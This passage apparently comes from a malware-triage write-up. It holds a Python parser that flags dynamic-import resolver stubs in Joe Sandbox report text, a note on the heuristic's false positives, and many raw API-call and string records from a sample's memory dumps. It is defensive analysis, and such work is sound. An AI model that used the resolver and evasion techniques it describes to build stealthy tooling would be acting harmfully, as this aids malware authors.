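• LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
• GetLastError.KERNEL32 ref: 004178FB
Similarity
• String ID:
• Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
Similarity
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
APIs
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
• FreeLibrary.KERNEL32(00000000), ref: 00413951
Similarity
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
"""

API_RE = re.compile(r"^(?P<name>\S+?)\.(?P<module>[A-Z0-9]+)"
                    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<fn>[0-9A-Fa-f]+):\s*(?P<rest>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
RESOLVERS = {"GetModuleHandleW", "GetModuleHandleA", "LoadLibraryW", "LoadLibraryA",
             "LoadLibraryExW", "LoadLibraryExA"}
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")  # plausible export name

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    via_subcall: str = ""  # callee address when the report lists it as a subcall

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # raw 'Strings' entries with xrefs
    meta: dict = field(default_factory=dict)     # 'Similarity' key/value pairs

    def string_ids(self):
        return [s for s in self.meta.get("String ID", "").split("$") if s]

def parse_records(text):
    """Every 'APIs' header opens a new record; bullets go to the open section."""
    records, section, rec = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                rec = FunctionRecord()
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            sub = SUBCALL_RE.match(body)
            m = API_RE.match(sub.group("rest") if sub else body)
            if m:
                args = [a for a in (m.group("args") or "").split(",") if a]
                rec.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                        m.group("ref"), sub.group("fn") if sub else ""))
        elif section == "Strings":
            rec.strings.append(body)
        elif section == "Similarity":
            key, _, value = body.partition(":")
            rec.meta[key.strip()] = value.strip()
    return records

def dynamic_imports(rec):
    """Heuristic: a module-handle call (direct or via subcall) next to a string
    pool of one DLL name plus export-like names marks a resolver stub."""
    if not any(c.name in RESOLVERS for c in rec.apis):
        return None
    ids = rec.string_ids()
    dlls = [s for s in ids if s.lower().endswith(".dll")]
    names = [s for s in ids if IDENT_RE.match(s)]
    return (dlls[0], names) if len(dlls) == 1 and names else None

def scan(text):
    """Return (dll, export names) for every resolver stub in a report excerpt."""
    return [hit for hit in map(dynamic_imports, parse_records(text)) if hit]
```

Run over the full report text the same parser gives one record per disassembled function, and the Instruction Fuzzy Hash in `meta` is the value to pivot on when hunting the same stub in other dumps. The heuristic is a triage aid, not a verdict: it would also fire on the comctl32.dll record further down (LoadLibraryW plus InitCommonControlsEx), which is ordinary GUI initialisation, so what makes the ntdll hit interesting is the resolved set itself (NtLoadDriver, NtSuspendProcess, NtQuerySystemInformation), not the resolution technique alone.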
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: -journal$-wal
                            • API String ID: 438689982-2894717839
                            • Opcode ID: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                            • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                            • Opcode Fuzzy Hash: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                            • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                            • String ID:
                            • API String ID: 4218492932-0
                            • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                            • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                            • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                            • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                            APIs
                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                              • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                              • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                            • memcpy.MSVCRT ref: 0044A8BF
                            • memcpy.MSVCRT ref: 0044A90C
                            • memcpy.MSVCRT ref: 0044A988
                              • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                              • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                            • memcpy.MSVCRT ref: 0044A9D8
                            • memcpy.MSVCRT ref: 0044AA19
                            • memcpy.MSVCRT ref: 0044AA4A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: gj
                            • API String ID: 438689982-4203073231
                            • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                            • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                            • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                            • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                            APIs
                            • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                            • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                            • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                            • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                            • memset.MSVCRT ref: 00405ABB
                            • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                            • SetFocus.USER32(?), ref: 00405B76
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: MessageSend$FocusItemmemset
                            • String ID:
                            • API String ID: 4281309102-0
                            • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                            • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                            • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                            • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _snwprintfwcscat
                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                            • API String ID: 384018552-4153097237
                            • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                            • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                            • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                            • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ItemMenu$CountInfomemsetwcschr
                            • String ID: 0$6
                            • API String ID: 2029023288-3849865405
                            • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                            • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                            • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                            • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                            APIs
                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                            • memset.MSVCRT ref: 00405455
                            • memset.MSVCRT ref: 0040546C
                            • memset.MSVCRT ref: 00405483
                            • memcpy.MSVCRT ref: 00405498
                            • memcpy.MSVCRT ref: 004054AD
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$memcpy$ErrorLast
                            • String ID: 6$\
                            • API String ID: 404372293-1284684873
                            • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                            • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                            APIs
                            • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                            • GetLastError.KERNEL32 ref: 0041855C
                            • Sleep.KERNEL32(00000064), ref: 00418571
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                            • GetLastError.KERNEL32 ref: 0041858E
                            • Sleep.KERNEL32(00000064), ref: 004185A3
                            • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: AttributesErrorFileLastSleep$??3@
                            • String ID:
                            • API String ID: 1040972850-0
                            • Opcode ID: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                            • Opcode Fuzzy Hash: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                            APIs
                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                            • wcscpy.MSVCRT ref: 0040A0D9
                            • wcscat.MSVCRT ref: 0040A0E6
                            • wcscat.MSVCRT ref: 0040A0F5
                            • wcscpy.MSVCRT ref: 0040A107
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                            • String ID:
                            • API String ID: 1331804452-0
                            • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                            • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                            APIs
                            Strings
                            • <?xml version="1.0" ?>, xrefs: 0041007C
                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                            • <%s>, xrefs: 004100A6
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$_snwprintf
                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                            • API String ID: 3473751417-2880344631
                            • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                            • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: wcscat$_snwprintfmemset
                            • String ID: %2.2X
                            • API String ID: 2521778956-791839006
                            • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                            • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _snwprintfwcscpy
                            • String ID: dialog_%d$general$menu_%d$strings
                            • API String ID: 999028693-502967061
                            • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                            • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                            APIs
                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                              • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                              • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                            • memset.MSVCRT ref: 0040C439
                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                            • _wcsupr.MSVCRT ref: 0040C481
                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                              • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                            • memset.MSVCRT ref: 0040C4D0
                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                            • String ID:
                            • API String ID: 1973883786-0
                            • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                            • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                            APIs
                            • memset.MSVCRT ref: 004116FF
                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                              • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                            • API String ID: 2618321458-3614832568
                            • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                            • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                            • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                            • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                            APIs
                            • memset.MSVCRT ref: 004185FC
                            • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                            • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@AttributesFilememset
                            • String ID:
                            • API String ID: 776155459-0
                            • Opcode ID: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                            • Opcode Fuzzy Hash: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                            APIs
                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                            • malloc.MSVCRT ref: 00417524
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                            • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                            • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                            • String ID:
                            • API String ID: 2308052813-0
                            • Opcode ID: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                            • Opcode Fuzzy Hash: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                            APIs
                            • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                            • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                            • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: PathTemp$??3@
                            • String ID: %s\etilqs_$etilqs_
                            • API String ID: 1589464350-1420421710
                            • Opcode ID: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                            • Opcode Fuzzy Hash: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ErrorLastMessage_snwprintf
                            • String ID: Error$Error %d: %s
                            • API String ID: 313946961-1552265934
                            • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                            • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                            • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                            • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: foreign key constraint failed$new$oid$old
                            • API String ID: 0-1953309616
                            • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                            • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                            • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                            • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                            APIs
                            Strings
                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                            • unknown column "%s" in foreign key definition, xrefs: 00431858
                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                            • API String ID: 3510742995-272990098
                            • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                            • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                            • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                            • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpymemset
                            • String ID: gj
                            • API String ID: 1297977491-4203073231
                            • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                            • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                            • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                            • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                            APIs
                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                              • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@
                            • String ID:
                            • API String ID: 613200358-0
                            • Opcode ID: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                            • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                            • Opcode Fuzzy Hash: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                            • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                            APIs
                            • AreFileApisANSI.KERNEL32 ref: 00417497
                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                            • malloc.MSVCRT ref: 004174BD
